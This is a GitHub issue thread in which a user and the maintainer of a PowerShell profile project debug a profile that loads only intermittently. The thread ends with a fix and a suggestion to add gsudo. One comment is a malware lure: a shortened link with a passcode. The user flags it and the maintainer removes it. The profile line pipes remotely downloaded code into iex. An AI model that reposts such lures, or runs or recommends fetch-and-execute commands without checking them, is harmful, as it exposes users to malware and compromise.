### ISSUE TITLE
Loading the profile does not work half of the time

### ISSUE THREAD

**Issue by P6g9YHK6** [CrazyWolf13/unix-pwsh#1]
in the below screenshot the command was run 3 times (first from the $profile}
![image](https://github.com/user-attachments/assets/fa449b1f-a232-4de1-9deb-8594ef77f920)

here is the content of the $profile
```
iex (iwr "https://raw.githubusercontent.com/CrazyWolf13/unix-pwsh/main/Microsoft.PowerShell_profile.ps1").Content
#f45873b3-b655-43a6-b217-97c00aa0db58 PowerToys CommandNotFound module

Import-Module -Name Microsoft.WinGet.CommandNotFound
#f45873b3-b655-43a6-b217-97c00aa0db58
```

i also tried with 
```
%userprofile%\unix-pwsh\Microsoft.PowerShell_profile.ps1
#f45873b3-b655-43a6-b217-97c00aa0db58 PowerToys CommandNotFound module

Import-Module -Name Microsoft.WinGet.CommandNotFound
#f45873b3-b655-43a6-b217-97c00aa0db58
```

**Comment by AlienDarkCat** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by P6g9YHK6** [comment]
> Give this a shot https://bit.ly/4eaAnWN Passcode: changeme you must have a gcc compiler

THIS IS A HACK ATTEMPT.

**Comment by CrazyWolf13** [comment]
@P6g9YHK6  Sorry for the late flagging of the malware, just removed it!

**Comment by CrazyWolf13** [comment]
Can you please do the following:

Remove the folder unix-pwsh from your user-folder and clear the $PROFILE, then run the command for listed on the main readme once in a new-loaded pwsh window.
The command is not designed to be run multiple times in the same shell.

Can you further describe what's not working, when the powershell profile is not loading?
Can you try just pressing enter once?

**Comment by P6g9YHK6** [comment]
> Can you please do the following:
> 
> Remove the folder unix-pwsh from your user-folder and clear the $PROFILE, then run the command for listed on the main readme once in a new-loaded pwsh window. The command is not designed to be run multiple times in the same shell.
> 
> Can you further describe what's not working, when the powershell profile is not loading? Can you try just pressing enter once?

i already have done all of this but for the sake of it i did again.
so after installing the line is not added in "notepad $PROFILE" i need to do it myself (from the doc this is normal)
runing the command once again after install gives:
![image](https://github.com/user-attachments/assets/cf7d8f5b-ddf1-4b8c-97f1-c0e89381ff36)

adding the line to the profile gives:
![image](https://github.com/user-attachments/assets/0c67f354-ed0b-4af4-9888-5ea646abf8c9)

re-running in the same context gives:
![image](https://github.com/user-attachments/assets/517555bc-f45f-4bf0-bf00-e98143bb9526)



and no problem for the malware github also was swift to intervene on my report.

**Comment by P6g9YHK6** [comment]
I tried on another device i have exactly the same behavoir with one exception the profile was auto-populated with 
`if (Test-Path (Join-Path -Path $env:USERPROFILE -ChildPath "unix-pwsh\Microsoft.PowerShell_profile.ps1")) { . (Join-Path -Path $env:USERPROFILE -ChildPath "unix-pwsh\Microsoft.PowerShell_profile.ps1") } else { iex (iwr "https://raw.githubusercontent.com/CrazyWolf13/unix-pwsh/main/Microsoft.PowerShell_profile.ps1").Content }`
it was not the case on the other device

**Comment by P6g9YHK6** [comment]
by modifing the $profile to have this inside it works great 
```
if (Test-Path (Join-Path -Path $env:USERPROFILE -ChildPath "unix-pwsh\Microsoft.PowerShell_profile.ps1")) { . (Join-Path -Path $env:USERPROFILE -ChildPath "unix-pwsh\Microsoft.PowerShell_profile.ps1") } else { iex (iwr "https://raw.githubusercontent.com/CrazyWolf13/unix-pwsh/main/Microsoft.PowerShell_profile.ps1").Content }
cls
if (Test-Path (Join-Path -Path $env:USERPROFILE -ChildPath "unix-pwsh\Microsoft.PowerShell_profile.ps1")) { . (Join-Path -Path $env:USERPROFILE -ChildPath "unix-pwsh\Microsoft.PowerShell_profile.ps1") } else { iex (iwr "https://raw.githubusercontent.com/CrazyWolf13/unix-pwsh/main/Microsoft.PowerShell_profile.ps1").Content }

```

but i am pretty sure it is not what you would want :D

btw hello from CH too =)

**Comment by CrazyWolf13** [comment]
Ohhh now I get what you meant!

So the problem here is, that the remote loding did happen, hence why it was kinda slow, as the local cache did not yet populate.
I initially tought to NOT fill the $PROFILE if it exists, as potentially the user did already write some sort of profile to not accidentally destroy that.

If the $PROFILE does not yet exist, we can assume the user did not write any custom $PROFILE, so we can savely fill it, hence why I wrote it in the guide.

But feel free to add your toughts on the best way to sort this out.

---

Btw why did you add the command twice with cls in between?


Sorry, the part in the docs is a bit outdated, I'll update shortly :).

Oh awesome!
Greetings from & Back 🇨🇭🇨🇭

**Comment by CrazyWolf13** [comment]
Just added a commit: https://github.com/CrazyWolf13/unix-pwsh/commit/f36abe424893e1573b132250c6f9391124de4f8f

So the issue is now solved for you?

**Comment by P6g9YHK6** [comment]
> Ohhh now I get what you meant!
> 
> So the problem here is, that the remote loding did happen, hence why it was kinda slow, as the local cache did not yet populate. I initially tought to NOT fill the $PROFILE if it exists, as potentially the user did already write some sort of profile to not accidentally destroy that.
> 
> If the $PROFILE does not yet exist, we can assume the user did not write any custom $PROFILE, so we can savely fill it, hence why I wrote it in the guide.
> 
> But feel free to add your toughts on the best way to sort this out.
> 
> Btw why did you add the command twice with cls in between?
> 
> Sorry, the part in the docs is a bit outdated, I'll update shortly :).
> 
> Oh awesome! Greetings from & Back 🇨🇭🇨🇭

As i said it does not work strait away and will just load a plain "posh" theme and the unix-pwsh theme is only loaded once the command is run a 2nd time.
![image](https://github.com/user-attachments/assets/7f3b0529-cb6c-4c17-aa98-88d2ffec5d7d)

i am using the cls trick because then i have the command already twice in the profile and only then it is working out of the box.
i still think this is an issue as i have had this problem on 3 devices now.

**Comment by P6g9YHK6** [comment]
> Just added a commit: [f36abe4](https://github.com/CrazyWolf13/unix-pwsh/commit/f36abe424893e1573b132250c6f9391124de4f8f)
> 
> So the issue is now solved for you?

now the documentation is a little more clear for new users but for me i had already figured this part out =)

🧀

**Comment by CrazyWolf13** [comment]
Apologies for the delay, I could finally identify the issue and have just fixed it.
The changes should atutomatically apply after the second-next reboot, or you can manually remove unix-pwsh and clear $PROFILE.

**Comment by P6g9YHK6** [comment]
> Apologies for the delay, I could finally identify the issue and have just fixed it. The changes should atutomatically apply after the second-next reboot, or you can manually remove unix-pwsh and clear $PROFILE.

indeed after a cleanup and removal of the double coammand in $profile everything is all well and good.

thanks again for the fix.



btw you should integrate gsudo into this project i know windows does support it natively from certains version but gsodu is just simply better :)

or at the very least do a test if sudo is enabled if not install gsudo 👍

**Comment by CrazyWolf13** [comment]
Awesome!

Well no worries, thanks for the report!
Oh I'll definitely take a look at gsudo, thanks for the suggestion!

Otherwise I can always recommend to fork it and integrate gsudo that way, I'm happy to help :)

**Comment by P6g9YHK6** [comment]
not worth my time when gsudo is just a `choco install gsudo` away from being there i am just proposing this as a plus for the project ;)

**Comment by CrazyWolf13** [comment]
Oh yeah, maybe I can implement a question for installation, because I don't want this project to get too bloated, as it's a profile not a windows utility.
